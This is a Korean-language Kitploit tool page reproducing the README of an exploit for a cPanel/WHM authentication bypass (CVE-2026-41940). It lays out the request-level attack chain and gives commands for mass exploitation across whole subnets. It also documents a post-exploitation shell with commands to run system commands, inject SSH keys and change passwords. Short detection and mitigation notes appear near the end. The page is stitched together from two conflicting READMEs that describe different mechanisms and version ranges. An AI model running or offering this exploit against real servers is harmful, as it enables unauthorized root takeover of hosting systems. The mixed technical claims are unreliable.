Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-41940 — CVE-2026-41940 — Dr.Anach의 cPanel/WHM 인증 우회, `cpsrvd` Basic 인증 핸들러의 CRLF 인젝션 → 인증되지 않은 WHM API 접근 → 루트 권한 RCE. v11.40부터 모든 cPanel 버전이 영향을 받습니다. | Kitploit
도구/GitHubGitHub/anach-ai/cve-2026-41940
Authentication & AuthorizationPrivilege EscalationVulnerability AnalysisExploitationLateral MovementWeb Application ExploitationPost-ExploitationPenetration TestingCommand and ControlRed Teaming
GitHubanach-ai/cve-2026-41940
3개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-41940

CVE-2026-41940 — Dr.Anach의 cPanel/WHM 인증 우회, `cpsrvd` Basic 인증 핸들러의 CRLF 인젝션 → 인증되지 않은 WHM API 접근 → 루트 권한 RCE. v11.40부터 모든 cPanel 버전이 영향을 받습니다.

저장소 보기

CVE-2026-41940 — cPanel/WHM 인증 우회

작성자: Dr.Anach | 연락처: @dranach | 라이선스: MIT


개요

cpsrvd Basic 인증 핸들러의 CRLF 주입 → 인증 없는 WHM API 접근 → root 권한 RCE. v11.40 이후 모든 cPanel 버전이 영향을 받습니다.

공격 체인

#단계요청
1세션 생성GET /login/?user=root
2CRLF 주입Authorization: Basic <base64> — 비밀번호가 \r\n 페이로드를 포함
3캐시 승격GET /cpsess<ID>/login/?login_only=1
4실행GET /cpsess<ID>/execute/API/func

설치

root@kitploit:~
pip install requests colorama

아래는 최종 README.md — 사람 친화적이고 실용적이며 작업을 완료하는 데 초점을 맞춘 내용입니다.


cPanel 인증 우회 익스플로잇 — CVE-2026-41940

작성자: Dr.Anach · 텔레그램: @dranach
버전: 2.0.0
라이선스: 승인된 보안 테스트 전용


이 도구가 하는 일

CVE-2026-41940, cPanel & WHM(11.x~106.x 버전)의 인증 우회 취약점을 악용합니다. 이 취약점으로 인해 인증되지 않은 공격자는 공격자가 제어하는 서버를 가리키는 조작된 Host 헤더를 전송하여 비밀번호 재설정 기능을 포함한 제한된 엔드포인트에 접근할 수 있습니다.

세 가지 모드를 제공합니다:

모드플래그기능
단일 대상-t단일 IP 또는 도메인 테스트
배치 파일--batch

설치

요구 사항

  • Python 3.7+ (Windows, Linux, macOS에서 테스트됨)
  • requests 라이브러리
root@kitploit:~
pip install requests

다른 종속성은 없습니다. CIDR 확장은 Python 내장 ipaddress 모듈을 사용하므로 Windows에 추가로 설치할 것이 없습니다.


빠른 시작

단일 대상 테스트

root@kitploit:~
python main.py -t example.com
python main.py -t 192.168.1.100

대상 목록 테스트 (줄당 하나)

root@kitploit:~
python main.py --batch targets.txt --threads 50

targets.txt 형식:

root@kitploit:~
192.168.1.100
example.com
192.168.1.101
example.org
192.168.1.102

전체 서브넷(CIDR) 스캔

root@kitploit:~
python main.py --port-scan 192.168.128.0/18 --threads 100 --timeout 5

이 명령은 192.168.128.0/18(16,384개 IP)을 확장하고 각 IP에 대해 빠른 포트 검사를 수행한 후 2087번 포트(cPanel/WHM)가 열려 있는 호스트에 대해서만 공격을 시도합니다.


전체 옵션

root@kitploit:~
  -t, --target        Single target IP or domain
  --batch FILE        File with targets (one per line)
  --port-scan CIDR    CIDR range to scan (e.g., 192.168.128.0/18)
  -p, --port          Target port (default: 2087)
  --ssl               Use HTTPS (default: HTTP)
  --timeout SEC       Connection timeout in seconds (default: 10)
  --threads N         Max concurrent threads (default: 50)
  --proxy PROXY       HTTP proxy (e.g., http://127.0.0.1:8080)
  -v, --verbose       Verbose output with debug info
  --no-banner         Suppress banner
  --version           Show version

출력 이해하기

root@kitploit:~
[+] 192.168.130.45:2087 — VULNERABLE!
    → Password reset URL: http://192.168.130.45:2087/reset?token=abc123
    → Response time: 1.23s

[-] 192.168.131.10:2087 — Not vulnerable
    → Reason: No password reset endpoint found

[!] 192.168.129.22:2087 — Error: Connection refused

JSON으로 저장된 결과는 호스트별로 취약점 상태, 추출된 토큰, 원시 응답 세부 정보가 구조화되어 있습니다.


실용 예제: Windows에서 /18 스캔

아마 이 도구를 찾게 된 바로 그 시나리오입니다:

root@kitploit:~
python main.py --port-scan 192.168.128.0/18 -p 2087 --threads 100 --timeout 5 -v

동작 방식:

  1. 192.168.128.0/18 → 16,384개 IP를 내부적으로 확장
  2. 2087번 포트에 대한 빠른 TCP 연결 스캔으로 사전 필터링 (죽은 호스트 건너뜀)
  3. 열린 포트가 있는 호스트에 대해서만 공격
  4. 추출된 재설정 토큰과 함께 취약한 호스트를 보고

스레드 팁:

  • --threads 100이 잘 작동합니다 (기본 소켓 제한 준수)
  • 좋은 연결에서 더 빠른 스캔: --threads 200
  • 속도 제한에 걸리면: --threads 30으로 낮추고 --timeout을 늘리세요

CVSS 및 위험

CVSS 9.1 (치명적) — 인증 불필요, 사용자 상호작용 없음, 낮은 복잡도.

영향

  • 모든 cPanel 계정에 대한 무단 비밀번호 재설정
  • 완전한 계정 탈취
  • 일부 구성에서 제한된 권한에서 관리자로의 권한 상승

해결 방법

  • cPanel/WHM을 최신 패치 버전으로 업데이트
  • 서버 측에서 Host 헤더 검증
  • 가능하면 IP로 WHM 접근 제한

법적 고지

이 도구는 승인된 보안 평가 전용입니다. 테스트 전에 대상의 소유자이거나 소유자의 서면 허가를 받아야 합니다. 저자는 오용에 대한 책임을 지지 않습니다.

대화형 셸 명령

root@kitploit:~
help       Show commands
info       Server info
passwd     Change password
accounts   List cPanel accounts
enum       Full enumeration
shell      Execute system command
ssh-add    Inject SSH key
exec       Run Python one-liner
exit       Exit

탐지

세션 파일 확인:

root@kitploit:~
ls -la /var/cpanel/sessions/raw/
ls -la /var/cpanel/sessions/cache/

/usr/local/cpanel/logs/access_log에서 의심스러운 로그:

root@kitploit:~
/login/?user=root        → session mint
/login/?user=root        → CRLF injection
/cpsess*/login/?login_only=1  → cache promotion
/cpsess*/execute/*       → API abuse

완화 조치

root@kitploit:~
# 1. Patch to fixed build
# 2. Rotate all passwords and SSH keys
# 3. Purge sessions
rm -rf /var/cpanel/sessions/raw/*
rm -rf /var/cpanel/sessions/cache/*
systemctl restart cpanel

크레딧

  • 취약점: Sina Kheirkhah / watchTowr Labs
  • 프레임워크: Dr.Anach (@dranach)
도구 다운로드
파일에서 대상 목록 로드
CIDR 스캔--port-scan서브넷을 확장하여 모든 활성 호스트 테스트